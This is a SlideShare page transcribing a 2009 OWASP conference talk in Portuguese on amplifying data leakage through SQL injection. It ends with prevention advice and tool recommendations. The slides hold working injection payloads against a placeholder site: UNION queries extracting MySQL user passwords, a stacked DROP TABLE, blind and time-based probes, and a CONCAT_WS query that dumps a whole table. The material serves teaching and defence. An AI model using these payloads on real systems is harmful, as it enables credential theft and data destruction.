SlideShare une entreprise Scribd logo

SQL Injection: Amplifying Data Leakeage

Ulisses Castro
Ulisses Castro

Palestra apresentada durante a Conferência Internacional de Segurança de Aplicações (AppSec Brasil 2009) http://www.owasp.org/index.php/AppSec_Brasil_2009

Technologie
1  sur  17
Télécharger pour lire hors ligne
SQL Injection Amplifying Data Leakage Ulisses Castro Security Researcher uss.castro@gmail.com OWASP Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
Ulisses Castro  Consultor, Instrutor e Pentester  Teste de Intrusão e Análise de Vulnerabilidades  Hardening S.O e Banco de Dados  Mantenedor Debian (selinux-basics)  CEH – Certified Ethical Hacker  LPIC-2 – Linux Professional Institute Certified  Colaborador em diversos projetos de software livre relacionados com segurança OWASP 2
Agenda Introdução Técnicas utilizadas Potencializando UNION (inband) group_concat concat_ws Demo PoC: sqlidump Idéias e possibilidades Prevenções Ferramentas recomendadas Duvidas, agradecimentos, contatos... OWASP 3
Introdução - O que é SQL Injection? Ataque de injeção em aplicações que não tratam de maneira adequada a entrada de dados do usuário permitindo que comandos SQL maliciosos possam ser enviados ao banco de dados. Uma das mais antigas e ainda mais utilizada vulnerabilidade em aplicações web. (1998 - Phrack 54) OWASP 4
Técnicas utilizadas UNION (inband) http://www.site.com/index.php?noticia=13 UNION ALL SELECT query -- http://www.site.com/index.php?noticia=13 UNION ALL SELECT null, concat(user,0x3a,password), null FROM mysql.user LIMIT 0,1-- STACKED http://www.site.com/index.asp?noticia=13; DROP TABLE noticias; -- OWASP 5
Técnicas utilizadas BLIND http://www.site.com/index.php?noticia=13 AND SUBSTRING(‘SELECT USER()’, 1, 1) = ‘a’-- BLIND (time based) http://www.site.com/index.php?noticia=13 UNION SELECT BENCHMARK(1000000000,MD5('testing')) OWASP 6
UNION (inband) DEMO Problema do LIMIT OWASP 7
Potencializando UNION (inband) GROUP_CONCAT() Retirado do manual (MySQL) “This function returns a string result with the concatenated non-NULL values from a group. (...) The result is truncated to the maximum length that is given by the group_concat_max_len system variable, which has a default value of 1024. (...)” OWASP 8
Potencializando UNION (inband) concat_ws() Retirado do manual (MySQL) “CONCAT_WS() stands for Concatenate With Separator and is a special form of CONCAT(). The first argument is the separator for the rest of the arguments. The separator is added between the strings to be concatenated. The separator can be a string, as can the rest of the arguments. If the separator is NULL, the result is NULL.” OWASP 9
Potencializando UNION (inband) concat_ws() Retirado do manual (MySQL) “CONCAT_WS() stands for Concatenate With Separator and is a special form of CONCAT(). The first argument is the separator for the rest of the arguments. The separator is added between the strings to be concatenated. The separator can be a string, as can the rest of the arguments. If the separator is NULL, the result is NULL.” OWASP 10
CONSULTA PREPARADA SELECT CONCAT('<DATA>','<row>',CONCAT_WS(CONCAT('<row>','<row>'), (CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>')),(SELECT CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>') FROM dummy.alunos LIMIT 1,1),(SELECT CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>') FROM dummy.alunos LIMIT 2,1)),'<row>','<DATA>') FROM dummy.alunos LIMIT 0,1; OWASP 11
RESULTADO <DATA> <row> <column>1<column> <column>Mario Brother<column> <column>mario@dummy.com<column> <row> <row> <column>2<column> <column>Luigi Brother<column> <column>luigi@dummy.com<column> <row> <row> <column>3<column> <column>Koopa Silva<column> <column>koopa@dummy.com<column> <row> <DATA> OWASP 12
Potencializando UNION (inband) DEMO sqlidump.py OWASP 13
Algumas idéias... BLIND QUERY SELECT ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),0x08) FROM dummy.alunos LIMIT 5,1),1,1)) <= 8; BLIND QUERY + CONCAT_WS() SELECT CONCAT('<BLIND>',GROUP_CONCAT(CONCAT( (ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),'NULO') FROM dummy.alunos LIMIT 1,1),1,1)) <= 8), (ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),'NULO') FROM dummy.alunos LIMIT 1,1),1,1)) <= 100) ) SEPARATOR '-'),'<BLIND>'); OWASP 14
Prevenções OWASP - SQL Injection Prevention Cheat Sheet Prepared Statements Stored Procedures Escapar e validar entrada Política do menor privilégio White list, regex, etc... OWASP 15
Ferramentas recomendadas... sqlmap http://sqlmap.sourceforge.net sqlsus http://sqlsus.sourceforge.net sqlninja http://sqlninja.sourceforge.net bsql hacker http://labs.portcullis.co.uk/application/bsql-hacker/ OWASP 16
OBRIGADO! CONTATOS: Ulisses Castro uss.castro@gmail.com http://ulissescastro.wordpress.com http://twitter.com/usscastro OWASP 17

Recommandé

Sql injection
Sql injection Sql injection
Sql injection Aaron Hill
 
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...solit
 
Nls
NlsNls
NlsAonjai Khemsuk
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APIcaswenson
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormguest785f78
 
Noinject
NoinjectNoinject
NoinjectJustin Swanhart
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
10 exceptionsin java
10 exceptionsin java10 exceptionsin java
10 exceptionsin javaAPU
 

Recommandé

Sql injection
Sql injection Sql injection
Sql injection Aaron Hill
 
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...
Solit 2013, Автоматизация тестирования сложных систем: mixed mode automated t...solit
 
Nls
NlsNls
NlsAonjai Khemsuk
 
Learning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APILearning Java 4 – Swing, SQL, and Security API
Learning Java 4 – Swing, SQL, and Security APIcaswenson
 
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormguest785f78
 
Noinject
NoinjectNoinject
NoinjectJustin Swanhart
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
10 exceptionsin java
10 exceptionsin java10 exceptionsin java
10 exceptionsin javaAPU
 
Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)Ferruh Mavituna
 
Advanced sql injection 2
Advanced sql injection 2Advanced sql injection 2
Advanced sql injection 2Karunakar Singh Thakur
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptssuserde23af
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1Bernardo Damele A. G.
 
Sql injection
Sql injectionSql injection
Sql injectionBee_Ware
 
Sql
SqlSql
SqlManish Dixit Ceh
 
DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks Felipe Prado
 
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一scalaconfjp
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
20161029 py con-mysq-lv3
20161029 py con-mysq-lv320161029 py con-mysq-lv3
20161029 py con-mysq-lv3Ivan Ma
 
Sq linjection
Sq linjectionSq linjection
Sq linjectionMahesh Gupta (DBATAG) - SQL Server Consultant
 
20160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab0120160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab01Ivan Ma
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300KOI Lastone
 
Jdbc ja
Jdbc jaJdbc ja
Jdbc jaDEEPIKA T
 
A MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverA MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverKeith Hollman
 
MongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-esMongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-esMongoDB
 
Java Performance Puzzlers
Java Performance PuzzlersJava Performance Puzzlers
Java Performance PuzzlersDoug Hawkins
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 

Contenu connexe

Similaire à SQL Injection: Amplifying Data Leakeage

Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injectionbadhanbd
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)Ferruh Mavituna
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptssuserde23af
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Sql injection
Sql injectionSql injection
Sql injectionBee_Ware
 
DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks Felipe Prado
 
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一scalaconfjp
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
20161029 py con-mysq-lv3
20161029 py con-mysq-lv320161029 py con-mysq-lv3
20161029 py con-mysq-lv3Ivan Ma
 
20160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab0120160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab01Ivan Ma
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300KOI Lastone
 
A MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverA MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverKeith Hollman
 
MongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-esMongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-esMongoDB
 
Java Performance Puzzlers
Java Performance PuzzlersJava Performance Puzzlers
Java Performance PuzzlersDoug Hawkins
 

Similaire à SQL Injection: Amplifying Data Leakeage (20)

Advanced sql injection
Advanced sql injectionAdvanced sql injection
Advanced sql injection
 
One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)One Click Ownage Ferruh Mavituna (3)
One Click Ownage Ferruh Mavituna (3)
 
Advanced sql injection 2
Advanced sql injection 2Advanced sql injection 2
Advanced sql injection 2
 
Advanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).pptAdvanced_SQL_ISASasASasaASnjection (1).ppt
Advanced_SQL_ISASasASasaASnjection (1).ppt
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql
SqlSql
Sql
 
DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks DEF CON 23 - amit ashbel and maty siman - game of hacks
DEF CON 23 - amit ashbel and maty siman - game of hacks
 
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
Building a Unified Data Pipline in Spark / Apache Sparkを用いたBig Dataパイプラインの統一
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 
20161029 py con-mysq-lv3
20161029 py con-mysq-lv320161029 py con-mysq-lv3
20161029 py con-mysq-lv3
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
20160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab0120160821 coscup-my sql57docstorelab01
20160821 coscup-my sql57docstorelab01
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300
 
Jdbc ja
Jdbc jaJdbc ja
Jdbc ja
 
A MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole CrossoverA MySQL Odyssey - A Blackhole Crossover
A MySQL Odyssey - A Blackhole Crossover
 
MongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-esMongoDB World 2019: Life In Stitch-es
MongoDB World 2019: Life In Stitch-es
 
Java Performance Puzzlers
Java Performance PuzzlersJava Performance Puzzlers
Java Performance Puzzlers
 

Dernier

Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 

Dernier (20)

Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 

SQL Injection: Amplifying Data Leakeage

  • 1. SQL Injection Amplifying Data Leakage Ulisses Castro Security Researcher uss.castro@gmail.com OWASP Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. Ulisses Castro  Consultor, Instrutor e Pentester  Teste de Intrusão e Análise de Vulnerabilidades  Hardening S.O e Banco de Dados  Mantenedor Debian (selinux-basics)  CEH – Certified Ethical Hacker  LPIC-2 – Linux Professional Institute Certified  Colaborador em diversos projetos de software livre relacionados com segurança OWASP 2
  • 3. Agenda Introdução Técnicas utilizadas Potencializando UNION (inband) group_concat concat_ws Demo PoC: sqlidump Idéias e possibilidades Prevenções Ferramentas recomendadas Duvidas, agradecimentos, contatos... OWASP 3
  • 4. Introdução - O que é SQL Injection? Ataque de injeção em aplicações que não tratam de maneira adequada a entrada de dados do usuário permitindo que comandos SQL maliciosos possam ser enviados ao banco de dados. Uma das mais antigas e ainda mais utilizada vulnerabilidade em aplicações web. (1998 - Phrack 54) OWASP 4
  • 5. Técnicas utilizadas UNION (inband) http://www.site.com/index.php?noticia=13 UNION ALL SELECT query -- http://www.site.com/index.php?noticia=13 UNION ALL SELECT null, concat(user,0x3a,password), null FROM mysql.user LIMIT 0,1-- STACKED http://www.site.com/index.asp?noticia=13; DROP TABLE noticias; -- OWASP 5
  • 6. Técnicas utilizadas BLIND http://www.site.com/index.php?noticia=13 AND SUBSTRING(‘SELECT USER()’, 1, 1) = ‘a’-- BLIND (time based) http://www.site.com/index.php?noticia=13 UNION SELECT BENCHMARK(1000000000,MD5('testing')) OWASP 6
  • 7. UNION (inband) DEMO Problema do LIMIT OWASP 7
  • 8. Potencializando UNION (inband) GROUP_CONCAT() Retirado do manual (MySQL) “This function returns a string result with the concatenated non-NULL values from a group. (...) The result is truncated to the maximum length that is given by the group_concat_max_len system variable, which has a default value of 1024. (...)” OWASP 8
  • 9. Potencializando UNION (inband) concat_ws() Retirado do manual (MySQL) “CONCAT_WS() stands for Concatenate With Separator and is a special form of CONCAT(). The first argument is the separator for the rest of the arguments. The separator is added between the strings to be concatenated. The separator can be a string, as can the rest of the arguments. If the separator is NULL, the result is NULL.” OWASP 9
  • 10. Potencializando UNION (inband) concat_ws() Retirado do manual (MySQL) “CONCAT_WS() stands for Concatenate With Separator and is a special form of CONCAT(). The first argument is the separator for the rest of the arguments. The separator is added between the strings to be concatenated. The separator can be a string, as can the rest of the arguments. If the separator is NULL, the result is NULL.” OWASP 10
  • 11. CONSULTA PREPARADA SELECT CONCAT('<DATA>','<row>',CONCAT_WS(CONCAT('<row>','<row>'), (CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>')),(SELECT CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>') FROM dummy.alunos LIMIT 1,1),(SELECT CONCAT('<column>',CONCAT_WS(CONCAT('<column>','<column>'),IFNULL(CAST(id AS CHAR(10000)),0x20),IFNULL(CAST(nome AS CHAR(10000)),0x20),IFNULL(CAST(email AS CHAR(10000)),0x20)),'<column>') FROM dummy.alunos LIMIT 2,1)),'<row>','<DATA>') FROM dummy.alunos LIMIT 0,1; OWASP 11
  • 13. Potencializando UNION (inband) DEMO sqlidump.py OWASP 13
  • 14. Algumas idéias... BLIND QUERY SELECT ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),0x08) FROM dummy.alunos LIMIT 5,1),1,1)) <= 8; BLIND QUERY + CONCAT_WS() SELECT CONCAT('<BLIND>',GROUP_CONCAT(CONCAT( (ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),'NULO') FROM dummy.alunos LIMIT 1,1),1,1)) <= 8), (ASCII(SUBSTR((SELECT IFNULL(CAST(id AS CHAR(10000)),'NULO') FROM dummy.alunos LIMIT 1,1),1,1)) <= 100) ) SEPARATOR '-'),'<BLIND>'); OWASP 14
  • 15. Prevenções OWASP - SQL Injection Prevention Cheat Sheet Prepared Statements Stored Procedures Escapar e validar entrada Política do menor privilégio White list, regex, etc... OWASP 15
